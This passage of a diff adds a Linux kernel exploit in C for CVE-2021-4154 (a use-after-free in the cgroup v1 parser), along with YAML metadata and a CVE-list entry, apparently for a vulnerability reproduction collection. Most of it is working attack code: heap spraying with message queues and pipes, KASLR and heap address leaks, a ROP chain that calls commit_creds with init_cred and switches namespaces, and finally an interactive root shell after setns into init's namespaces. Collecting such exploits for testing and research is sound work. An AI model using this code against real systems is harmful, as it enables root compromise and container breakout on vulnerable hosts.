+  syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
+  do_sandbox_namespace();
+  return 0;
+}
+
+
+static void pre_exploit() {
+  struct rlimit old_lim;
+
+  // pin_on_cpu(0);
+
+  if(getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
+    printf("Old limits -> soft limit= %ld \t"
+          " hard limit= %ld \n", old_lim.rlim_cur,
+                               old_lim.rlim_max);
+
+  for (int i=0; i<MAX_MSG_SPRAY+200; i++) {
+    msg_ids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
+    if (msg_ids[i] < 0) {
+      err(1, "msgget");
+    }
+  }
+
+  int pid = fork();
+  if (pid<0) err(1, "fork");
+  if (pid) {
+    while(1) {
+      sleep(1000000);
+    }
+  }
+
+  for (int i=0; i<2*MAX_PIPE_NUM; i++) {
+    if (pipe(pipes[i]) < 0) {
+      err(1, "pipe");
+    }
+  }
+
+}
+
+void msg_recv(int msqid, int msg_type, char *data, size_t size) {
+  if(msgrcv(msqid, data, size, msg_type, MSG_NOERROR | IPC_NOWAIT | MSG_COPY) < 0) {
+    perror("msgrcv");
+    exit(-1);
+  }
+}
+
+void msg_free(int msqid, int msg_type, char *data, size_t size) {
+  if(msgrcv(msqid, data, size, msg_type, 0) < 0) {
+    perror("msgrcv");
+  }
+}
+
+void vsleep(int n) {
+  while(n--) {
+    printf("sleep %d\n", n+1);
+    sleep(1);
+  }
+}
+
+static void exploit() {
+  char data[0x2000] = {};
+  struct msg *m = (struct msg*)data;
+  int time;
+  m->mtype = 1;
+  pin_on_cpu(3);
+
+  // step 1: prepare uaf context
+  setup_uaf();
+
+  // step 2: spray files, including uaf file
+  printf("spraying files\n");
+  // defragment
+  for (int i=0; i<MAX_FILE_NUM/2; i++) {
+    fds[i] = open("./data", O_RDONLY);
+    if (fds[i] < 0) {
+      err(1, "open data");
+    }
+  }
+  uaf_fd = open("./data", O_RDONLY);
+
+  // slab size for file : 0x1000
+  // 0x1000/0x140 = 12
+
+  for (int i=0; i<MAX_FILE_NUM/2; i++) {
+    fds[MAX_FILE_NUM/2+i] = open("./data", O_RDONLY);
+    if (fds[MAX_FILE_NUM/2+i] < 0) {
+      err(1, "open data 2");
+    }
+  }
+
+  set_uaffd();
+
+  printf("start free files\n");
+  // step 3: free files, should free the file slab
+  // make sure we will free a least one slab page
+  close(uaf_fd); // remove the uaf fd to prevent crash
+  for (int i=0; i<400; i++) {
+    close(fds[MAX_FILE_NUM/2-200+i]);
+  }
+  close(fs_fd_1);
+  sleep(1);
+
+  // step 3: spray msg 512 for 4 core cpu
+  for (int i=0; i<MAX_MSG_SPRAY; i++) {
+    memset(m->data, 'A', 0x1800);
+    if (msgsnd(msg_ids[i], (void *)m, 0x1000+0x200-48-8, 0) != 0) {
+      err(1, "msgsnd");
+    }
+  }
+
+  printf("spray msg done, now free the msg\n");
+  // step 4: now free the file object through fs_context
+  // indeed, it frees msg
+  close(fs_fd_2);
+  sleep(1);
+  printf("freed msg\n");
+  // getchar();
+  // sleep(3);
+  // getchar();
+  // step 5: we should be able to find the msg freed now
+  char leak[0x2000];
+  unsigned long slab_rand = 0;
+  int msg_id = -1;
+  int leak_offset = 0;
+  // printf("now leaking...\n");
+  for (int j=0; j<MAX_MSG_SPRAY; j++) {
+    // printf("%d\n", j);
+    // vsleep(1);
+    memset(leak, 0, 0x2000);
+    // set a larger value to prevent allocate in the freed memory
+    msg_recv(msg_ids[j], 0, leak, 0x1400-48-8);
+    for (int i=0x10; i<0x1200-48-8-0x10; i+=8) {
+      if (*(unsigned long int*)(leak+i) != 0x4141414141414141) {
+        printf("we got a leak at %x\n", i);
+        leak_offset = i;
+        printf("leaked value : %lx\n", *(unsigned long int*)(leak+i));
+        slab_rand = *(unsigned long int*)(leak+i);
+        msg_id = j;
+        DumpHex(leak+i, 0x100);
+        break;
+      }
+    }
+
+    if (slab_rand) {
+      break;
+    }
+  }
+
+  if (!slab_rand) {
+    printf("no luck, try again\n");
+    getchar();
+    exit(-1);
+  }
+  printf("leak done\n");
+  if (leak_offset <= 0x1000) {
+    printf("likely to fail\n");
+    getchar();
+    exit(-1);
+  }
+  // getchar();
+  // step 6: now spray pipe to get a kaslr leak
+  for (int i=0; i<MAX_PIPE_NUM; i++) {
+    // 8*40 = 320 > 256
+    fcntl(pipes[i][1], F_SETPIPE_SZ, 0x8000);
+  }
+
+  // init pipe_buffer
+  for (int i=0; i<MAX_PIPE_NUM; i++) {
+    write(pipes[i][1], "KCTF", 4);
+  }
+
+  // step 7, now, let's leak ops
+  memset(leak, 0, 0x2000);
+  unsigned long *pipe_buffer = 0;
+  unsigned long pipe_ops = 0;
+  unsigned long pipe_page = 0; 
+  msg_recv(msg_ids[msg_id], 0, leak, 0x1400-48-8);
+  pipe_ops = *(unsigned long int*)(leak+0x10+leak_offset);
+  pipe_page = *(unsigned long int*)(leak+leak_offset);
+  DumpHex(leak+leak_offset, 0x20);
+
+  kaslr_offset = pipe_ops - 0xffffffff81e3ce40;
+  printf("kaslr offset : %lx\n", kaslr_offset);
+  printf("found pipe ops at: 0x%lx\n", pipe_ops);
+  printf("foudn page at: 0x%lx\n", pipe_page);
+  msg_free(msg_ids[msg_id+1], 1, leak, 0x1200-48-8);
+
+  unsigned long int heap = 0;
+  unsigned long int heap_rand = 0;
+  int pipe_victim_idx = -1;
+  for (int j=0; j<MAX_PIPE_NUM; j++) {
+    // free buffer
+    // printf("%d\n", j);
+    fcntl(pipes[j][1], F_SETPIPE_SZ, 0xa000);
+    memset(leak, 0, 0x1200);
+    msg_recv(msg_ids[msg_id], 0, leak, 0x1400-48-8);
+
+    heap_rand = *(unsigned long int*)(leak+leak_offset);
+    if (heap_rand && heap_rand != pipe_page) {
+      printf("heap rand: %lx\n", heap_rand);
+      heap = heap_rand ^ slab_rand;
+      printf("found heap addr : 0x%lx\n", heap);
+      break;
+    }
+    pipe_victim_idx = j;
+  }
+
+  assert(heap);
+
+  printf("leak done\n");
+  // getchar();
+
+  // spray msg a little bit to put payload there
+  memset(m->data, 0, 0x1800);
+
+  for (int j=MAX_PIPE_NUM; j<MAX_PIPE_NUM*2; j++) {
+    // printf("%d\n", j);
+    pipe_victim_idx = j;
+    int stop = 0;
+    fcntl(pipes[j][1], F_SETPIPE_SZ, 0x8000);
+    memset(leak, 0, 0x1400);
+    msg_recv(msg_ids[msg_id], 0, leak, 0x1400-48-8);
+    for (int i=0; i<0x1200-48-8-0x10; i+=8) {
+      
+      if (*(unsigned long int*)(leak+0x10+i) != 0x4141414141414141) {
+        if (heap_rand != *(unsigned long int*)(leak+0x10+i)) {
+          printf("stop spraying\n");
+          stop = 1;
+        }
+        // DumpHex(leak+i, 0x30);
+        break;
+      }
+    }
+    if (stop) break;
+  }
+
+  write(pipes[pipe_victim_idx][1], "KCTF", 4);
+  printf("pipe on again\n");
+  // getchar();
+
+  int pid = getpid();
+
+  // now we spray memory on known heap
+
+  // llseek --> arb read
+  // read --> arb write
+
+  // ops which is rdx
+  memset(m->data, 0, 0x1800);
+  unsigned long int *ops = (unsigned long int*)(m->data+0x1000-48);
+  *ops++ = 0xffffffff811004c3 + kaslr_offset; // : push rsi ; jmp qword ptr [rsi + 0x2e]
+  *ops++ = 0xffffffff811004c3 + kaslr_offset; // : push rsi ; jmp qword ptr [rsi + 0x2e]
+  *ops++ = 0xffffffff811004c3 + kaslr_offset; // : push rsi ; jmp qword ptr [rsi + 0x2e]
+  // 0xffffffff81c03275 : push rsi ; jmp qword ptr [rsi + 0x56]
+  // start rop here
+
+  // *(unsigned long int*)(m->data+0x1000-48+0x46) = 0xffffffff81218967; // pop rsp ; add eax, 0x83480000 ; ret
+  // *(unsigned long int*)(m->data+0x1000-48-8+0x46) = 0xffffffff81218967; // pop rsp ; add eax, 0x83480000 ; ret
+
+  unsigned long int *rop = (unsigned long int*)(m->data+0x1000-48-8+0x20);
+  *rop++ = 0xffffffff816fa405 + kaslr_offset; // enter 0,0; push rbp; mov ebp, esp;
+  *rop++ = heap+0x180; // r14, store rbp
+  *rop++ = 0xdeadbeef; // rbp
+  // move rbp to heap;
+  *rop++ = 0xffffffff81503f78 + kaslr_offset; // mov qword ptr [r14], rbx ; pop rbx ; pop r14 ; pop rbp ; ret
+  *rop++ = 0xdeadbeef;
+  *rop++ = 0xdeadbeef;
+  *rop++ = 0xdeadbeef;
+
+  // commit_creds(init_cred)
+  *rop++ = 0xffffffff81067a60 + kaslr_offset; // pop rdi
+
+  // *rop++ = 0;
+  // *rop++ = 0xffffffff8109f330 + kaslr_offset; // prepare kernel cred
+  // *rop++ = 0xffffffff8108d212 + kaslr_offset; // pop rdx
+  // *rop++ = 1;
+  // *rop++ = 0xffffffff8154e861 + kaslr_offset; // cmp rdx, 1 ; jne 0xffffffff8154e89d ; pop rbp ; ret
+  // *rop++ = 0xdeadbeef; // rbp
+  // *rop++ = 0xffffffff8123cb26 + kaslr_offset; // mov rdi, rax ; jne 0xffffffff8123cb16 ; pop rbp ; ret
+  // *rop++ = 0xdeadbeef; // rbp
+
+  *rop++ = 0xffffffff82250950 + kaslr_offset; // init_cred
+  *rop++ = 0xffffffff8109ed70 + kaslr_offset; // commit_creds
+
+  // 0xffffffff82219700 init_task
+  // 0xffffffff82250580 init_ns
+
+  // switch context
+  *rop++ = 0xffffffff81067a60 + kaslr_offset;
+  *rop++ = 1;
+  *rop++ = 0xffffffff810963e0 + kaslr_offset; // find_task_by_vpid
+  *rop++ = 0xffffffff8108d212 + kaslr_offset; // pop rdx
+  *rop++ = 1;
+  *rop++ = 0xffffffff8154e861 + kaslr_offset; // cmp rdx, 1 ; jne 0xffffffff8154e89d ; pop rbp ; ret
+  *rop++ = 0xdeadbeef; // rbp
+  *rop++ = 0xffffffff8123cb26 + kaslr_offset; // mov rdi, rax ; jne 0xffffffff8123cb16 ; pop rbp ; ret
+  *rop++ = 0xdeadbeef; // rbp
+  *rop++ = 0xffffffff8105d30f + kaslr_offset; // pop rsi ; ret
+  *rop++ = 0xffffffff82250580 + kaslr_offset; // init_nsproxy
+  *rop++ = 0xffffffff8109d1a0 + kaslr_offset; // switch_task_namespaces
+
+  // return execution
+  *rop++ = 0xffffffff81000571 + kaslr_offset; // pop rbp
+  *rop++ = heap+0x180+0x10;
+  *rop++ = 0xffffffff8123e2cd + kaslr_offset; // : push qword ptr [rbp - 0x10] ; pop rbp ; ret
+  *rop++ = 0xffffffff810679cc + kaslr_offset; // : mov rsp, rbp ; pop rbp ; ret
+
+
+
+  // spray ops
+  for (int i=MAX_MSG_SPRAY; i<MAX_MSG_SPRAY+100; i++) {
+    if (msgsnd(msg_ids[i], (void *)m, 0x1000+0x200-48-8, 0) != 0) {
+      err(1, "msgsnd");
+    }
+  }
+
+  // ffffffff81298fd0 free_pipe_info
+  // 0xffffffff81299049 call r11
+
+  
+  // arb read
+  // 0xffffffff8104f385 : mov rax, qword ptr [rsi + 0x18] ; ret
+
+  // cos
+  // 0xffffffff810239b1 : mov eax, dword ptr [rsi - 0x38b7fffb] ; ret
+
+  // arb write
+  // 0xffffffff8116005b : mov qword ptr [rsi], rdx ; ret
+  // 0xffffffff81ab62f8 : mov dword ptr [rdx], esi ; ret
+
+  // *payload++ = 
+  // ops == known_heap
+  // rdx is the ops == 0
+  // rax == pipe_buffer+0x10 == 0
+
+  // rcx == rsi == the pipe_buffer { page, 8 byte, ops}
+  // 0xffffffff8108b6b7 : jmp qword ptr [rdx]
+  // 0xffffffff826c61b7 : jmp qword ptr [rdx + 0x23]
+  // 0xffffffff81feff8e : push rcx ; jmp qword ptr [rdx + 0x46]
+  // 0xffffffff811004c3 : push rsi ; jmp qword ptr [rsi + 0x2e]
+
+  // 0xffffffff81218967 : pop rsp ; add eax, 0x83480000 ; ret
+  // 0xffffffff816fa405 : enter 0, 0 ; pop rbx ; pop r14 ; pop rbp ; ret
+  // 0xffffffff81503f78 : mov qword ptr [r14], rbx ; pop rbx ; pop r14 ; pop rbp ; ret
+
+  // 0xffffffff81067a60 : pop rdi ; ret
+  // 0xffffffff8108d212 : pop rdx ; ret
+
+  // 0xffffffff81000571 : pop rbp ; ret
+  // 0xffffffff8123e2cd : push qword ptr [rbp - 0x10] ; pop rbp ; ret
+  // 0xffffffff810679cc : mov rsp, rbp ; pop rbp ; ret
+
+  // 0xffffffff8154e861 : cmp rdx, 1 ; jne 0xffffffff8154e89d ; pop rbp ; ret
+  // 0xffffffff810566ac : pop rcx ; ret
+  // 0xffffffff8123cb26 : mov rdi, rax ; jne 0xffffffff8123cb16 ; pop rbp ; ret
+  // 0xffffffff8105d30f : pop rsi ; ret
+
+  // hijack ops
+  msg_free(msg_ids[msg_id], 1, leak, 0x1200-48-8);
+  // make fcount == 0 preventing crash.
+  memset(m->data, 0, 0x1800);
+  unsigned long int *payload = (unsigned long int *)(m->data+0x1000-48);
+  *(unsigned long int*)(m->data + leak_offset-8) = 0xffffffff810c7fbe + kaslr_offset; // : pop rsp ; ret; // rsp // page
+  *(unsigned long int*)(m->data + leak_offset)   = heap+0x20; // offset
+  *(unsigned long int*)(m->data + leak_offset+8) = heap; // ops
+
+  *(unsigned long int*)(m->data + leak_offset-8+0x28) = heap+0x100; // ops
+
+  *(unsigned long int*)(m->data + leak_offset-8+0x2e) = 0xffffffff81218967 + kaslr_offset; // pop rsp ; add eax, 0x83480000 ; ret
+
+  for (int i=MAX_MSG_SPRAY+100; i<MAX_MSG_SPRAY+200; i++) {
+    if (msgsnd(msg_ids[i], (void *)m, 0x1000+0x200-48-8, 0) != 0) {
+      err(1, "msgsnd");
+    }
+  }
+
+  printf("done, hijacking\n");
+  // getchar();
+  close(pipes[pipe_victim_idx][1]);
+  close(pipes[pipe_victim_idx][0]);
+
+  if (setns(open("/proc/1/ns/mnt", O_RDONLY), 0) < 0) {
+    perror("setns 1\n");
+  }
+  if (setns(open("/proc/1/ns/pid", O_RDONLY), 0) < 0) {
+    perror("setns 2\n");
+    setns(open("/proc/1/ns/pid", O_RDONLY), 0);
+  }
+  char *args[] = {"/bin/bash", "-i", NULL};
+  execve(args[0], args, NULL);
+  printf("exit...\n");
+  getchar();
+}
+
+
+
+
+int main(void) {
+  use_temporary_dir();
+  do_exp();
+}
--- a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml
@ -0,0 +1,20 @@
+id: CVE-2021-4154
+source: https://github.com/delsploit/CVE-2022-2078
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: high
+  description: |
+    A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system.
+  scope-of-influence:
+    Linux Kernel versions prior to 5.14 rc2
+  reference:
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2034514	
+    - https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002	
+    - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id...	
+    - https://security.netapp.com/advisory/ntap-20220225-0004/
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2021-4154
+    cwe-id: 416
+  tags: cve2021,内存错误引用 
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@ -13,6 +13,7 @@ cve:
  linux-kernel:
    - CVE-2021-4204
    - CVE-2021-22555
+    - CVE-2021-4154
    - CVE-2022-34918
    - CVE-2022-2639
    - CVE-2022-0847